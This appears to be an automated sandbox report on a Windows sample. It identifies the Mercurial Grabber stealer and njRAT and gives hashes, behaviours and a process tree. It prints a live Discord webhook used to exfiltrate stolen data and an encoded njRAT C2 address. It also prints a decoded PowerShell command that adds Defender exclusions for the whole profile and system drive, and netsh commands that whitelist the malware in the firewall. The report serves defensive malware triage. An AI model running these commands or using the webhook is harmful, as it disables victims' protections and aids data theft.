Analysis

max time kernel: 154s
max time network: 193s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-10-2022 23:24

Static task: static1
Behavioral task: behavioral1
Sample: 4e6984054c17293752f8d11ccac45e70.exe
Resource: win7-20220901-en
General

Target: 4e6984054c17293752f8d11ccac45e70.exe
Size: 159KB
MD5: 4e6984054c17293752f8d11ccac45e70
SHA1: 96b45cc928488f23eb485ebd72f1276996c7f785
SHA256: 8d38d3866a011792617c9784fc9dc556f0c8c6aeeeb96aef679aea6ff6831028
SHA512: 978e885d724fd91553483a077979f940a9349e45fce08b4a39c5cac25a5a75e0dd27b166b4724be19a435beef780ad8f866787035944285222385623af1ce9a5
SSDEEP: 3072:C6x5F6chV9MBOefbGEKr2fewpgsRMCo1pn2A3PM+:CK6u9p3EKbwhRMCkp
Malware Config

Extracted: mercurialgrabber
  Discord webhook: https://discord.com/api/webhooks/1020039781461270569/vy0h8kS-gC86OffrPKkierhCOJQYdMCGfu4Dr7HRyL4VcCHEP6llcvNaOkPDg-SgwAnl

Extracted: njrat
  version: 0.7d
  botnet: HacKed
  c2: Ni50Y3AuZXUubmdyb2suaW8Strik:MTM5OTI=
  mutex: dcc8f8f212bdcee4931d8d1d2c481753
  reg_key: dcc8f8f212bdcee4931d8d1d2c481753
  splitter: |'|'|
Signatures

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoC)
Processes: output.exe
  Key opened: \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions (output.exe)

Executes dropped EXE (2 IoCs)
Processes: output.exe, Windows Defender.exe
  pid 4704: output.exe
  pid 5028: Windows Defender.exe

Looks for VMWare Tools registry key (2 TTPs, 1 IoC)
Processes: output.exe
  Key opened: \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools (output.exe)

Modifies Windows Firewall (1 TTP, 3 IoCs)
Processes: netsh.exe
  pid 4408: netsh.exe
  pid 776: netsh.exe
  pid 332: netsh.exe

Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
Processes: output.exe
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (output.exe)

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes: 4e6984054c17293752f8d11ccac45e70.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation (4e6984054c17293752f8d11ccac45e70.exe)

Drops startup file (2 IoCs)
Processes: Windows Defender.exe
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe (Windows Defender.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe (Windows Defender.exe)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 11: ip4.seeip.org
  flow 12: ip-api.com
  flow 10: ip4.seeip.org

Maps connected drives based on registry (3 TTPs, 2 IoCs)
Disk information is often read in order to detect sandboxing environments.
Processes: output.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum (output.exe)
  Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 (output.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (2 IoCs)
Processes: WerFault.exe
  pid 4648 (WerFault.exe), target pid 4704 (output.exe)
  pid 3836 (WerFault.exe), target pid 4704 (output.exe)

Checks SCSI registry key(s) (3 TTPs, 1 IoC)
SCSI information is often read in order to detect sandboxing environments.
Processes: output.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S (output.exe)

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: output.exe
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (output.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (output.exe)

Delays execution with timeout.exe (5 IoCs)
Processes: timeout.exe
  pids 3764, 3644, 3572, 3160, 4324: timeout.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
Processes: output.exe
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 (output.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation (output.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer (output.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName (output.exe)
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: powershell.exe
  pid 4252: powershell.exe (2 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes: Windows Defender.exe
  pid 5028: Windows Defender.exe

Suspicious use of AdjustPrivilegeToken (39 IoCs)
Processes: output.exe, powershell.exe, Windows Defender.exe
  Token: SeDebugPrivilege, pid 4704 (output.exe)
  Token: SeDebugPrivilege, pid 4252 (powershell.exe)
  Token: SeDebugPrivilege, pid 5028 (Windows Defender.exe)
  The remaining 36 entries alternate Token: 33 and Token: SeIncBasePriorityPrivilege, all for pid 5028 (Windows Defender.exe).

Suspicious use of WriteProcessMemory (46 IoCs)
Processes: 4e6984054c17293752f8d11ccac45e70.exe, cmd.exe, Windows Defender.exe, output.exe
Each entry gives the writing pid and process and the target process; the sandbox lists identical entries several times, so they are collapsed here with a count.
  PID 4916 (4e6984054c17293752f8d11ccac45e70.exe) wrote to memory of 4252 (powershell.exe), 3 entries
  PID 4916 (4e6984054c17293752f8d11ccac45e70.exe) wrote to memory of 4704 (output.exe), 2 entries
  PID 4916 (4e6984054c17293752f8d11ccac45e70.exe) wrote to memory of 5028 (Windows Defender.exe), 3 entries
  PID 4916 (4e6984054c17293752f8d11ccac45e70.exe) wrote to memory of 1324 (cmd.exe), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 4040 (chcp.com), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 1064 (mode.com), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 4324 (timeout.exe), 3 entries
  PID 5028 (Windows Defender.exe) wrote to memory of 4408 (netsh.exe), 3 entries
  PID 5028 (Windows Defender.exe) wrote to memory of 776 (netsh.exe), 3 entries
  PID 5028 (Windows Defender.exe) wrote to memory of 332 (netsh.exe), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 3764 (timeout.exe), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 3644 (timeout.exe), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 3572 (timeout.exe), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 3160 (timeout.exe), 3 entries
  PID 1324 (cmd.exe) wrote to memory of 4224 (mode.com), 3 entries
  PID 4704 (output.exe) wrote to memory of 4648 (WerFault.exe), 2 entries
Processes

Process tree; indentation shows the parent/child level, each entry gives the image path, the command line and the signatures that fired on it.

C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="
    decoded -EncodedCommand (base64 of UTF-16LE): <#clz#>Add-MpPreference <#eug#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#xiz#> -Force <#llc#>
    The <# ... #> blocks are inline comment padding; the effective command adds Microsoft Defender exclusions for the whole user profile and the system drive before the payloads are started.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\output.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\output.exe"
    - Looks for VirtualBox Guest Additions in registry
    - Executes dropped EXE
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Maps connected drives based on registry
    - Checks SCSI registry key(s)
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\WerFault.exe
      command line: C:\Windows\system32\WerFault.exe -u -p 4704 -s 1936
      - Program crash

    C:\Windows\system32\WerFault.exe
      command line: C:\Windows\system32\WerFault.exe -u -p 4704 -s 1936
      - Program crash

  C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
    - Executes dropped EXE
    - Drops startup file
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\netsh.exe
      command line: netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
      - Modifies Windows Firewall

    C:\Windows\SysWOW64\netsh.exe
      command line: netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
      - Modifies Windows Firewall

    C:\Windows\SysWOW64\netsh.exe
      command line: netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
      - Modifies Windows Firewall

  C:\Windows\SysWOW64\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\chcp.com
      command line: chcp 65001

    C:\Windows\SysWOW64\mode.com
      command line: mode 80,15

    C:\Windows\SysWOW64\timeout.exe
      command line: timeout 3
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      command line: timeout 2
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      command line: timeout 2
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      command line: timeout 3
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      command line: timeout 2
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\mode.com
      command line: mode 130,30

C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -pss -s 408 -p 4704 -ip 4704
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
  Filesize: 93KB
  MD5: 0c6c4a3d96c78a24d6568b83e141896e
  SHA1: f5fb76840cb984722f61b370fb6641fa4ad9ac7e
  SHA256: 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
  SHA512: 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be
C:\Users\Admin\AppData\Local\Temp\output.exe
  Filesize: 41KB
  MD5: 5f34fc15a6555433e91d8dc0564d2092
  SHA1: dc786e4ddf9af8de8909da2489d2848dd39f762a
  SHA256: c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c
  SHA512: fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238
C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat
  Filesize: 19KB
  MD5: 4b4e566a986fe97ba2d89f9c64a24c64
  SHA1: 18bba3d5058b4b53fc99f9fba94110f4e8f8c2ea
  SHA256: 2950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97
  SHA512: 32e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8